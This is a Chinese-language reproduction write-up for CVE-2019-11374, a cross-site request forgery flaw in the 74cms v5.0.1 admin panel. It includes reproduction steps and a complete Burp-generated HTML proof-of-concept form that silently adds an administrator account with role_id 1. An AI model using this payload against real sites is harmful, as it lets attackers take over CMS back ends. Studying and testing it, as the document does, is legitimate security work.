CVE-2019-11374 74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞

一、漏洞简介

在74CMS v5.0.1后台存在一个跨站请求伪造(CSRF)漏洞，该漏洞url：/index.php?m=admin&c=admin&a=add 攻击者可以利用该漏洞诱骗管理员点击恶意页面，从而任意添加一个后台管理员账户，达到进入后台，获得一个后台管理员角色的控制权。

二、漏洞影响

74CMS v5.0.1

三、复现过程

首先是骑士cms的安装，设置管理员账户名为admin777,密码也是admin777

安装完成后如下url进入后台

http://url/74cms/index.php?m=admin&c=index&a=login

输入管理员账号密码同为admin777进入后台

点击系统一栏，进入到【系统】->【网络管理员】->【添加管理员】中，进行添加管理员

填入自定义的用户名密码邮箱，选择好所属角色，点击添加后抓包

使用burp生成csrf POC

POC代码:

<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://url/74cms/index.php?m=admin&c=admin&a=add" method="POST">
      <input type="hidden" name="username" value="test007" />
      <input type="hidden" name="email" value="test&#64;qq&#46;com" />
      <input type="hidden" name="password" value="test007" />
      <input type="hidden" name="repassword" value="test007" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

测试Poc前记得先在管理页面删除test007用户，以免无法确定Poc可用性

赋值html内容到本地的Poc.html文件中测试Poc

原管理员列表:

点击Poc.html中的Submit Request按钮

点击后显示操作成功

回来管理员列表刷新页面查看管理员是否成功添加: